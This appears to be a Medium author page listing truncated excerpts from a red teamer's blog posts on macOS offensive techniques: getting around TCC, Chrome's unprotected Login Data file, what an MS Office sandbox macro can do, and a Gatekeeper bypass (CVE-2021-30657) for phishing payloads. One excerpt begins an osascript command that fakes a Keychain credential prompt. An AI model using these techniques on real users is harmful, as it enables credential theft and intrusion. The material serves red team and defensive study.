This post builds on content from ’s prior blog post “Acting Red — Seeing Blue” (link). Specifically, I automated HELK server standup using terraform to stand up your HELK server in Digital Ocean with the appropriate specs as well as with firewall rules to protect access to your HELK server. And of course is the brains behind HELK, so shoutout to Roberto for the great work!

HELK Server

Preparation Steps

  1. You will need a Digital Ocean account if you do not have one already. Once created, you will need to create an ssh key pair and then upload the public…


This blog post will take a look at some simple basics around what macOS privacy controls (Transparancy, Consent, and Control a.k.a. TCC) are and how red team operations on macOS hosts can still be effective despite these controls. This blog post will not cover any TCC bypasses but will instead look at working around TCC controls. If you are more interested in TCC bypasses, @theevilbit and @_r3ggi have done some great research in this area, have written several blog posts, and are also doing a talk at Black Hat 2021 on this subject.

I will (at a high level) talk…


This blog will take a quick look at Chrome files on macOS that are not protected by TCC and do not require root access to read from. As these files are not protected by TCC, any non-sandboxed macOS payload will be able to access these files without needing TCC permissions.

Chrome Files Not Protected by TCC

Note: Some Chrome files are locked when Chrome is running. However, as these files are not protected by TCC you can simply copy the locked file to another location and read from it there.

  • ~/Library/Application Support/Google/Chrome/Default/Login Data (sqlite3 database)
  • — → interesting tables:
  • —…


This blog will take a look at some observations regarding what is still possible from the MS Office Sandbox on macOS. This is a combination of insight from others as well as some tests that I have attempted. Hopefully this will help readers better understand what is possible via remote sandboxed access gained through an MS Office macro.

Binaries

What are some macOS binaries that can be executed from sandboxed MS Office macros? Below are some:

  • osascript: You can prompt the user for credentials (ex: osascript -e ‘set popup to display dialog \”Keychain Access wants to use the login keychain\”…


This is a quick follow-up to my previous blog where I discussed how I found the bug behind CVE-2021–30657 (link to previous blog, which also contains a link to Patrick Wardle’s deep dive into the bug itself: https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508). In this blog post I will share another very basic method that abuses this bug in unpatched versions of macOS (i.e., versions of Big Sur prior to 11.3 and Catalina 10.15.7 versions before Catalina Update 2021–002). Apple’s fix DOES prevent this method from working on patched versions of macOS. The Apple Security Advisory for macOS 11.3 can be found at: https://support.apple.com/en-us/HT212325.


This post will briefly discuss how a bug that I uncovered in macOS Catalina 10.15 (specifically tested on 10.15.7) and in macOS Big Sur before Big Sur 11.3 allows an attacker to very easily craft a macOS payload that is not checked by Gatekeeper. This payload can be used in phishing and all the victim has to do is double click to open the .dmg and double-click the fake app inside of the .dmg — no pop ups or warnings from macOS are generated. Therefore, if you are reading this, please update to Big Sur 11.3 or Catalina update 2021–002…


I currently work as an offensive security engineer in the tech industry and have been in security now for 17 years (I cannot believe it has been this long!). However, I have worked in various capacities across different security functions through my security career. I have learned that there is no “right path” into security and that each person’s journey provides a unique perspective on things. In this post, I will highlight my journey and things I have learned along the way

Chapter 1

The first 5 years of my career.

I began my professional experience as an IT Auditor…


The areas of responsibility for internal red teams include many different aspects, ranging from tool development to operations planning and execution to infrastructure standup/maintenance and everything in between. As an internal red teamer, I believe there are opportunities for automation that will allow teams to more efficiently operate by handling some of the routine and repetitive tasks. I do not believe that red team functions as a whole can be automated — there are too many factors that require human intervention/insight/experience. This article will instead look at some practical examples of how red teams can automate infrastructure standup.

Infrastructure Needs


In this blog post, I will skip over talking about what red teaming is and discuss some common approaches to red teaming often used by internal corporate red teams. I will briefly mention some of the approaches and discuss some considerations of each and hopefully this will help internal red teams as they figure out and plan how they want to approach red teaming. Also of note: red teams often perform other tasks that are not listed in this blog as well…this blog just highlights different approaches specifically around red team operations.

Approach 1: A Long Running Operation

In this approach, an internal red team will…


I recently started a side project looking at what python-based post exploitation making Objective C calls looks like on modern macOS systems (Catalina and Big Sur). spearheaded python based post exploitation on macOS years ago with his EmPyre project. However a lot has changed on macOS since then so this became a fun side project for me. Apple has stated plans to remove scripting runtimes from base OS installs, however python 2 in particular still continues to hang around. In fact, the initial release of Big Sur includes python 2 in its base OS installs (yes you read…

Cedric Owens

Red teamer with blue team roots🤓👨🏽‍💻 Twitter: @cedowens

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store